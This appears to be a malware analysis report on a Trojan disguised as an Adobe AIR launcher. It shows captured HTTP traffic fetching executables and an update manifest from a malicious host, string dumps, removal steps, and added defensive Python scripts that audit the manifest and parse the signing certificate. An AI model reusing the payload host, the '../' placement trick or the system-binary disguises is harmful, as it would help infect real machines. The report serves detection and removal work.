GET /Update/main.swf?1420990603282 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:34 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 392738
Last-Modified: Sat, 03 Jan 2015 12:48:37 GMT
Connection: keep-alive
Accept-Ranges: bytes
CWS.....x....\M....Yk..w...K.&..;:'I.Y%....*...B9n..].I......a$E..Bf0.
0I..0.3..3...|.........^....n.}..u...Z....V,.....K.J.QA..N%E....^e....
...<"..|...&&&...h........G.62.5k........ia......k....e....cH......
.........o........."..lD.a`...........F.......!....B.c.G.._.nc7.J.9<
;0z..8j....hb>0\..{...M........f........b-..`cjlbj`la`j.cbfeF...fln
el./}.n.w..!1...1...<........d.......4c............Uq.....R........
n....7rcT.....4...Y....M.6.*p.J.U.......FF.....5h.k..f.....7..........
...DF.`....u....::. d...:.'.2.. $z....!...?Jf...KT...`...........2.~..
?;.6...*4":&0be.....m...l..dn.hialf?.............a....)....?u..... 7..
..k..................fa...4........b.?..K..Z[...:.T..........B..:..v..
.........?...gq...\.U...-.....k..,i..L.6.p.......S..I.F...n......F..L.
qZ.F .r..D...K...'..(.......P..'&.-.S.VB,.m...y...../..D....Z....j....
u......T`[email protected] ...`&PO8m....6Z...I?.
.k....oC......[.7.{;..=p...r.>9.a..o.6... [email protected]..<
.........B..po`........xG...X.-`..d.....K..e...dl ...@!..d%p...Lb.....
TW....P`3.n.pg-iG.....#....F.qm......`.F..f`k,..G~'...Tm.8..K. ..v;.y.
........$.>.~&..$.m.H.=..d..T.`.P.......Gt.$y.....}9$......,.X..H=.
..'.....N......"..b2......B9.RIrB0.........uD.....$.FR?Md..I.N..Z..S..
..ng..s.p.....g..n......N.....2....M4......].^...n...Irr......!5u...G.
.O.~Ot.......C..#[email protected]`...3...".."m...7..[ [email protected].#
.>...D..3.....?.....!'.E....B.Ka..B.....R.0.B.x...)..@!X.B..B.2A...
.....h...o.).O..K.8.....N..iP0...q..r-.w.)..J.-....8=...R..pYDA.Oa<<< skipped >>>
GET /Update/mimetype?1420990604517 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:36 GMT
Content-Length: 59
Connection: keep-alive
Last-Modified: Sat, 03 Jan 2015 12:48:37 GMT
ETag: "700004-3b-50bbee037d340"
Accept-Ranges: bytes
application/vnd.adobe.air-application-installer-package zip....
GET /Update/svchost.exe?1420990604642 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:36 GMT
Content-Type: application/octet-stream
Content-Length: 59392
Last-Modified: Wed, 22 Feb 2012 21:05:48 GMT
Connection: keep-alive
Accept-Ranges: bytes
[response body: 59392-byte PE executable (MZ/PE headers, .text and .rdata sections visible), binary not reproduced]<<< skipped >>>
GET /Update/Adobe AIR/Versions/1.0/Adobe AIR.dll?1420990604923 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:36 GMT
Content-Type: application/octet-stream
Content-Length: 14317952
Last-Modified: Wed, 22 Feb 2012 21:01:28 GMT
Connection: keep-alive
Accept-Ranges: bytes
[response body: 14317952-byte PE DLL (MZ/PE headers, .text, .rodata and .rdata sections visible), binary not reproduced]<<< skipped >>>
GET /update.xml?1420990600032 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:32 GMT
Content-Type: text/xml
Content-Length: 3993
Last-Modified: Sat, 03 Jan 2015 14:00:06 GMT
Connection: keep-alive
Accept-Ranges: bytes
<xml>
  <file>
    <fileName>svchostUpdate.exe</fileName>
    <fileDir>../</fileDir>
    <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/launcher/svchostUpdate.exe</fileDirWebServer>
    <filesize>59392</filesize>
  </file>
  <file>
    <fileName>main.swf</fileName>
    <fileDir></fileDir>
    <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/main.swf</fileDirWebServer>
    <filesize>392738</filesize>
  </file>
  <file>
    <fileName>mimetype</fileName>
    <fileDir></fileDir>
    <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/mimetype</fileDirWebServer>
    <filesize>59</filesize>
  </file>
  <file>
    <fileName>svchost.exe</fileName>
    <fileDir></fileDir>
    <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/svchost.exe</fileDirWebServer>
    <filesize>59392</filesize>
  </file>
  <file>
    <fileName>Adobe AIR.dll</fileName>
    <fileDir>Adobe AIR/Versions/1.0/</fileDir>
    <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/Adobe AIR/Versions/1.0/Adobe AIR.dll</fileDirWebServer>
    <filesize>14317952</filesize>
  </file>
  <file>
    <fileName>Adobe AIR.vch</fileName>
    <fileDir>Adobe AIR/Versions/1.0/Resources/</fileDir>
    <fileDirWebServer>hXXp://VVV.shmonka.ru/Update/Adobe AIR/Versions/1.0/Resources/Adobe AIR.vch</fileDirWeb<<< skipped >>>
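The update.xml above is the manifest that drives the launcher's download loop: every <file> entry pairs a download URL with a relative install directory and a declared size. Two things in it deserve a second look: the svchostUpdate.exe entry carries a fileDir of ../, so an updater that joins fileDir and fileName without checking for parent-directory components writes that file one level above its own directory (which matches the %System%\svchostUpdate.exe sitting beside the %System%\svchost\ tree in the file list below), and every URL is plain http, so nothing on the wire stops a network-position attacker from swapping the payload. The Python script below is an added example, not code from the page or from the malware: it parses a manifest of this shape, resolves where each entry would land, and flags traversal, cleartext transport, declared-size versus served Content-Length mismatches, and system-binary name collisions. The sample manifest is transcribed from the capture with the page's defanged hXXp://VVV. restored to http://www. and the truncated last entry left out; the Content-Length values come from the captured responses; the /app install root and the list of system binary names are assumptions for illustration.

```python
import posixpath
from urllib.parse import urlsplit
from xml.etree import ElementTree as ET

# Constructed sample: the update.xml captured above, transcribed with the
# page's defanged "hXXp://VVV." restored to "http://www." and the final
# entry, which is truncated on the page, omitted.
UPDATE_XML = """<xml>
<file><fileName>svchostUpdate.exe</fileName><fileDir>../</fileDir>
<fileDirWebServer>http://www.shmonka.ru/Update/launcher/svchostUpdate.exe</fileDirWebServer><filesize>59392</filesize></file>
<file><fileName>main.swf</fileName><fileDir></fileDir>
<fileDirWebServer>http://www.shmonka.ru/Update/main.swf</fileDirWebServer><filesize>392738</filesize></file>
<file><fileName>mimetype</fileName><fileDir></fileDir>
<fileDirWebServer>http://www.shmonka.ru/Update/mimetype</fileDirWebServer><filesize>59</filesize></file>
<file><fileName>svchost.exe</fileName><fileDir></fileDir>
<fileDirWebServer>http://www.shmonka.ru/Update/svchost.exe</fileDirWebServer><filesize>59392</filesize></file>
<file><fileName>Adobe AIR.dll</fileName><fileDir>Adobe AIR/Versions/1.0/</fileDir>
<fileDirWebServer>http://www.shmonka.ru/Update/Adobe AIR/Versions/1.0/Adobe AIR.dll</fileDirWebServer><filesize>14317952</filesize></file>
</xml>"""

# Content-Length the server actually returned for the downloads that appear
# in the captures above (mimetype, svchost.exe, Adobe AIR.dll).
OBSERVED_CONTENT_LENGTH = {
    "http://www.shmonka.ru/Update/mimetype": 59,
    "http://www.shmonka.ru/Update/svchost.exe": 59392,
    "http://www.shmonka.ru/Update/Adobe AIR/Versions/1.0/Adobe AIR.dll": 14317952,
}

# Assumptions for illustration: the updater's application root, and names
# an updater has no business writing under any directory.
APP_DIR = "/app"
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}


def parse_manifest(xml_text):
    """One dict per <file> entry: name, relative dir, download URL, declared size."""
    root = ET.fromstring(xml_text)
    return [{
        "name": f.findtext("fileName", ""),
        "dir": f.findtext("fileDir", ""),
        "url": f.findtext("fileDirWebServer", ""),
        "size": int(f.findtext("filesize", "0")),
    } for f in root.findall("file")]


def install_path(entry, app_dir=APP_DIR):
    """Where the file lands if the updater joins app_dir/fileDir/fileName
    without rejecting '..' (normalised the way the filesystem would)."""
    return posixpath.normpath(posixpath.join(app_dir, entry["dir"], entry["name"]))


def audit(entries, observed_lengths, app_dir=APP_DIR):
    """Findings per file name. Checks: fileDir escaping the app root (path
    traversal), cleartext transport, declared size vs. served Content-Length,
    and file names that imitate Windows system binaries."""
    root = app_dir.rstrip("/") + "/"
    findings = {}
    for e in entries:
        problems = []
        target = install_path(e, app_dir)
        if not target.startswith(root):
            problems.append(f"path traversal: would write {target}")
        if urlsplit(e["url"]).scheme == "http":
            problems.append("cleartext http download, tamperable in transit")
        served = observed_lengths.get(e["url"])
        if served is not None and served != e["size"]:
            problems.append(f"size mismatch: manifest {e['size']} vs served {served}")
        if e["name"].lower() in SYSTEM_BINARY_NAMES:
            problems.append("name imitates a Windows system binary")
        if problems:
            findings[e["name"]] = problems
    return findings


def indicators(entries):
    """Sorted, deduplicated hosts and URL paths to block or hunt for."""
    hosts = sorted({urlsplit(e["url"]).netloc for e in entries})
    paths = sorted({urlsplit(e["url"]).path for e in entries})
    return hosts, paths


if __name__ == "__main__":
    entries = parse_manifest(UPDATE_XML)
    for name, problems in audit(entries, OBSERVED_CONTENT_LENGTH).items():
        print(name, "->", "; ".join(problems))
    print(indicators(entries))
```

On this manifest the declared sizes agree with what the server served, so the size check is quiet; the traversal, cleartext and name-collision checks are the ones that fire. The host and path lists from indicators() are the pieces to feed into a proxy block list or a retrospective hunt over web logs.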
GET /Update/launcher/launcher.swf?1420990601267 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:32 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 3200
Last-Modified: Sat, 03 Jan 2015 14:45:49 GMT
Connection: keep-alive
Accept-Ranges: bytes
[response body: 3200-byte compressed SWF (CWS header), binary not reproduced]<<< skipped >>>
GET /Update/launcher/META-INF/signatures.xml?1420990601454 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:33 GMT
Content-Type: text/xml
Content-Length: 6026
Last-Modified: Sat, 03 Jan 2015 14:45:49 GMT
Connection: keep-alive
Accept-Ranges: bytes
<signatures>
  <Signature xmlns="hXXp://VVV.w3.org/2000/09/xmldsig#" Id="PackageSignature">
    <SignedInfo>
      <CanonicalizationMethod Algorithm="hXXp://VVV.w3.org/TR/2001/REC-xml-c14n-20010315"/>
      <SignatureMethod Algorithm="hXXp://VVV.w3.org/TR/xmldsig-core#rsa-sha1"/>
      <Reference URI="#PackageContents">
        <Transforms>
          <Transform Algorithm="hXXp://VVV.w3.org/TR/2001/REC-xml-c14n-20010315"/>
        </Transforms>
        <DigestMethod Algorithm="hXXp://VVV.w3.org/2001/04/xmlenc#sha256"/>
        <DigestValue>VTOyj+vs7OBPMsG68HpfpIOTZ0D7VHOnAKee5YTYXdc=</DigestValue>
      </Reference>
    </SignedInfo>
    <SignatureValue Id="PackageSignatureValue">TLejgvPrtic+V+Ld6YHzz6I38cgFHPgdUHItyEmDfn98RL/W56ajfV8UaU5dBZxvI6bl78EAVLRN
hQtE5wCqgss0WuQGwHuAymnWvDMBzGY3Sk4ixtDuSqhBgyr5sCVHQ5fJzgCfhBQD7uKL6tVnEUT0
8KezkaowOusM5nXnzA0=</SignatureValue>
    <KeyInfo>
      <X509Data>
        <X509Certificate>MIICFTCCAX2gAwIBAgIaNDY3ZTFmMTI6MTQ1MTIxNDAwNjQ6LTgwMDAwDQYJKoZIhvcNAQEFBQAw
NzELMAkGA1UEBhMCVVMxDDAKBgNVBAoTA2xvbDEMMAoGA1UECxMDbG9sMQwwCgYDVQQDEwNsb2ww
HhcNMTQwMzI5MDkyMTExWhcNMTkwMzMwMDkyMTExWjA3MQswCQYDVQQGEwJVUzEMMAoGA1UEChMD
bG9sMQwwCgYDVQQLEwNsb2wxDDAKBgNVBAMTA2xvbDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC
gYEAjk4dU8Duq3j+ntLT8PKKWpdL586NVNdHMRthmgAi/2mk2B8GuR6vas9fN8kxR53M3XkCtOt
WF89x8WvKZ5CswNSARuBtsM5l7YQCTZWjNp8Qvq1hbC6lvaBMAAJRcN8YgF0EqZH9Jm6Q2TDfUkm
wCnWTYnc<<< skipped >>>
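The signatures.xml above is the XML-DSig envelope AIR verifies before it runs a package (RSA-SHA1 over a SHA-256 digest of the package contents), and the X509Certificate inside it is the only statement of who signed the launcher. The certificate is truncated on the page, but its first four base64 lines are intact, and the fields an analyst cares about (serial, signature algorithm, issuer, validity, subject) all sit before the public key in a DER certificate, so they survive in that prefix. The Python below is an added example, not code from the page or from the malware: a minimal, truncation-tolerant DER walker that reads those fields out of the visible prefix. The base64 constant is that prefix transcribed from the capture; the OID table and field names are my own.

```python
import base64

# Visible prefix of the <X509Certificate> element in the captured
# signatures.xml above: its first four 76-character base64 lines, joined.
# The rest of the certificate is truncated on the page, so only this
# prefix is reproduced here.
CERT_B64_PREFIX = (
    "MIICFTCCAX2gAwIBAgIaNDY3ZTFmMTI6MTQ1MTIxNDAwNjQ6LTgwMDAwDQYJKoZIhvcNAQEFBQAw"
    "NzELMAkGA1UEBhMCVVMxDDAKBgNVBAoTA2xvbDEMMAoGA1UECxMDbG9sMQwwCgYDVQQDEwNsb2ww"
    "HhcNMTQwMzI5MDkyMTExWhcNMTkwMzMwMDkyMTExWjA3MQswCQYDVQQGEwJVUzEMMAoGA1UEChMD"
    "bG9sMQwwCgYDVQQLEwNsb2wxDDAKBgNVBAMTA2xvbDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC"
)

# Only the OIDs needed to read this certificate; anything else is shown raw.
OID_NAMES = {
    "2.5.4.3": "CN", "2.5.4.6": "C", "2.5.4.10": "O", "2.5.4.11": "OU",
    "1.2.840.113549.1.1.1": "rsaEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
}


def read_tlv(buf, pos):
    """Read one DER tag/length/value at pos. Returns (tag, value, next_pos).
    A length that runs past the end of buf is clipped, which is what makes
    the walker usable on a truncated dump."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = min(pos + length, len(buf))
    return tag, buf[pos:end], end


def decode_oid(raw):
    arcs = [raw[0] // 40, raw[0] % 40]
    value = 0
    for b in raw[1:]:                      # base-128 arcs, high bit = continuation
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def decode_name(raw):
    """X.501 Name: SEQUENCE OF (SET OF (SEQUENCE { type OID, value }))."""
    parts, pos = [], 0
    while pos < len(raw):
        _, rdn, pos = read_tlv(raw, pos)   # SET
        _, atv, _ = read_tlv(rdn, 0)       # SEQUENCE { type, value }
        _, oid, p = read_tlv(atv, 0)
        _, val, _ = read_tlv(atv, p)
        name = decode_oid(oid)
        parts.append(f"{OID_NAMES.get(name, name)}={val.decode('latin-1')}")
    return ", ".join(parts)


def parse_cert_prefix(b64_text):
    """Recover serial, signature algorithm, issuer, validity and subject from
    a possibly truncated base64 X.509 certificate."""
    der = base64.b64decode("".join(b64_text.split()))
    _, cert, _ = read_tlv(der, 0)          # Certificate ::= SEQUENCE { tbs, alg, sig }
    _, tbs, _ = read_tlv(cert, 0)          # TBSCertificate
    tag, _, pos = read_tlv(tbs, 0)         # [0] EXPLICIT version is optional
    if tag != 0xA0:
        pos = 0
    _, serial, pos = read_tlv(tbs, pos)
    _, alg, pos = read_tlv(tbs, pos)
    _, alg_oid, _ = read_tlv(alg, 0)
    _, issuer, pos = read_tlv(tbs, pos)
    _, validity, pos = read_tlv(tbs, pos)
    _, not_before, p = read_tlv(validity, 0)
    _, not_after, _ = read_tlv(validity, p)
    _, subject, pos = read_tlv(tbs, pos)
    printable = all(0x20 <= b < 0x7F for b in serial)
    alg_name = decode_oid(alg_oid)
    info = {
        "serial": serial.decode("ascii") if printable else serial.hex(),
        "signature_algorithm": OID_NAMES.get(alg_name, alg_name),
        "issuer": decode_name(issuer),
        "not_before": not_before.decode("ascii"),
        "not_after": not_after.decode("ascii"),
        "subject": decode_name(subject),
    }
    info["self_signed"] = info["issuer"] == info["subject"]
    return info


if __name__ == "__main__":
    for key, value in parse_cert_prefix(CERT_B64_PREFIX).items():
        print(f"{key:>20}: {value}")
```

Run against the captured prefix, the walker reports a self-signed certificate with subject and issuer C=US, O=lol, OU=lol, CN=lol, valid from 2014-03-29 to 2019-03-30, signed with sha1WithRSAEncryption. AIR accepts self-signed publisher certificates, so a valid package signature here proves only that the package was not altered after the author signed it, not who the author is; the signer is plainly not Adobe, whatever the file names and the AdobeAIR User-Agent suggest.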
GET /Update/launcher/META-INF/AIR/application.xml?1420990601610 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:33 GMT
Content-Type: text/xml
Content-Length: 1400
Last-Modified: Sat, 03 Jan 2015 14:45:49 GMT
Connection: keep-alive
Accept-Ranges: bytes
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!--
  Usage:
  To localize the description, use the following format for the description element.
  <description>
    <text xml:lang="en">English App description goes here</text>
    <text xml:lang="fr">French App description goes here</text>
    <text xml:lang="ja">Japanese App description goes here</text>
  </description>
  To localize the name, use the following format for the name element.
  <name>
    <text xml:lang="en">English App name goes here</text>
    <text xml:lang="fr">French App name goes here</text>
    <text xml:lang="ja">Japanese App name goes here</text>
  </name>
-->
<application xmlns="hXXp://ns.adobe.com/air/application/3.2">
  <id>launcher</id>
  <versionNumber>1.4</versionNumber>
  <filename>launcher</filename>
  <description/>
  <name>launcher</name>
  <copyright/>
  <initialWindow>
    <content>launcher.swf</content>
    <systemChrome>standard</systemChrome>
    <transparent>false</transparent>
    <visible>false</visible>
    <fullScreen>false</fullScreen>
    <aspectRatio>portrait</aspectRatio>
    <renderMode>auto</renderMode>
    <maximizable>false</maximizable>
    <minimizable>false</minimizable>
    <resizable>false</resizabl<<< skipped >>>
GET /Update/launcher/META-INF/AIR/hash?1420990601735 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:33 GMT
Content-Length: 32
Connection: keep-alive
Last-Modified: Sat, 03 Jan 2015 14:45:49 GMT
ETag: "940422-20-50bc0835ba140"
Accept-Ranges: bytes
[response body: 32-byte binary package hash, not reproduced]
The Trojan connects to the servers at the following location(s):
hXXp://VVV.shmonka.ru/ (Host header of every request captured above)
WPFFontCache_v0400.exe_1988:
.text
`.data
@.rsrc
@.reloc
t1Ht.Ht
Ht.Ht
8Y%u(
Ht.Ht$Ht
tGHt;Ht.Ht$Ht
!!"$%%&$%%&())*
%s %s line %d
SHELL32.dll
RPCRT4.dll
MSVCR100_CLR0400.dll
KERNEL32.dll
ADVAPI32.dll
RegNotifyChangeKeyValue
RegCloseKey
RegQueryInfoKeyW
RegOpenKeyExW
GetSystemWindowsDirectoryW
_crt_debugger_hook
_amsg_exit
wpffontcache_v0400.pdb
.?AVMalformedKeyException@@
.?AVNotSupportedException@@
6666666666666666
666666666666
6666666
8888888
!"#$%&'()* ,-./
0000000000000
#@$@$@$@$
@:@$@$@$@$@$@$@$@$@$@$
!"#$%&'()* ,-./0
%&'(gggg)* ,..........................................................................................MMMM..
4444444444444
#$%&'()*
!!!!"#$%&'()* ,-./0123456789:;<=
KEYW
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="wpffontcache_v0400" type="win32"></assemblyIdentity><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
4 4}455<5
:":&:*:.:2:
0!0&0,03090?0
1 1$1(1,1014181
>0>8>`>~>
1$1@1\1|1
Software\Microsoft\Avalon.Graphics
kernel32.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
MARLETT.TTF
E\\?\
\WPFFontCache_v0400-System.dat
{2da8dded-086f-4cb9-a77f-b974b9cb0186}\\?\UNC\
{00000000-0000-0000-0000-000000000000}\\?\Volume
yKERNEL32.DLL
KeySize
ElementMalformedKeyTask
CacheMissReportReceivedTask
wpffontcache_v0400.exe
4.0.30319.1 built by: RTMRel
.NET Framework
4.0.30319.1
launcher.exe_844:
.text
`.rdata
@.data
.rsrc
@.reloc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
g:\Acro_root_apb\Main\code\build\win\results\Release\info\CaptiveAppEntry.pdb
GetProcessHeap
KERNEL32.dll
SHELL32.dll
USER32.dll
SHLWAPI.dll
GetCPInfo
msi.dll
GetConsoleOutputCP
%WinDir%\System32\launcher.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>3 3$3@3\3`3
hXXp://VVV.adobe.com/go/getair_tr adresinden (Turkish: "from the address")
hXXp://VVV.adobe.com/go/getair_se
hXXp://VVV.adobe.com/go/getair_pl
Deze toepassing vereist een versie van Adobe AIR die niet is gevonden. (Dutch: "This application requires a version of Adobe AIR that was not found.")
hXXp://VVV.adobe.com/go/getair_nl
of neem contact op met de schrijver van de toepassing voor een bijgewerkte versie. (Dutch: "or contact the application's author for an updated version.")
hXXp://VVV.adobe.com/go/getair_cz
hXXp://VVV.adobe.com/go/getair
hXXp://VVV.adobe.com/go/getair_cn
hXXp://VVV.adobe.com/go/getair_ru
o mais recente do tempo de execu (Portuguese, truncated: "the latest ... of the runtime")
hXXp://VVV.adobe.com/go/getair_br
hXXp://VVV.adobe.com/go/getair_kr
hXXp://VVV.adobe.com/go/getair_jp
hXXp://VVV.adobe.com/go/getair_it
hXXp://VVV.adobe.com/go/getair_fr
hXXp://VVV.adobe.com/go/getair_es,
hXXp://VVV.adobe.com/go/getair,
hXXp://VVV.adobe.com/go/getair_de
from hXXp://VVV.adobe.com/go/getair.
\Versions\1.0\Adobe AIR.dll
runtimes\air\win\Adobe AIR\Versions\1.0\Adobe AIR.dll
runtimeSDK\Adobe AIR\Versions\1.0\Adobe AIR.dll
\Adobe AIR\Versions\1.0\Adobe AIR.dll
kernel32.dll
mscoree.dll
KERNEL32.DLL
{DC74C3C6-CAB8-4C49-BE18-5B1DCD0D197E}
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1872
instal.exe:1992
launcher.exe:1532
WPFFontCache_v0400.exe:1988
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (2917 bytes)
%Documents and Settings%\%current user%\Application Data\svchost.exe (12 bytes)
%Documents and Settings%\%current user%\Application Data\pandahack.exe (18251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%System%\Adobe AIR\Versions\1.0\Adobe AIR.dll (324576 bytes)
%System%\META-INF\AIR\application.xml (1 bytes)
%System%\svchostUpdate.exe (1067 bytes)
%Program Files%\Company\Test\Uninstall.exe (3195 bytes)
%System%\META-INF\AIR\hash (32 bytes)
%System%\launcher.swf (3 bytes)
%System%\META-INF\signatures.xml (818 bytes)
%System%\launcher.exe (329 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\adobecp.dll (90336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (34242 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll (162417 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\CaptiveAppEntry.exe (1568 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\AdobeCP15.dll (60436 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\Adobe AIR.vch (20637 bytes)
%System%\mimetype (59 bytes)
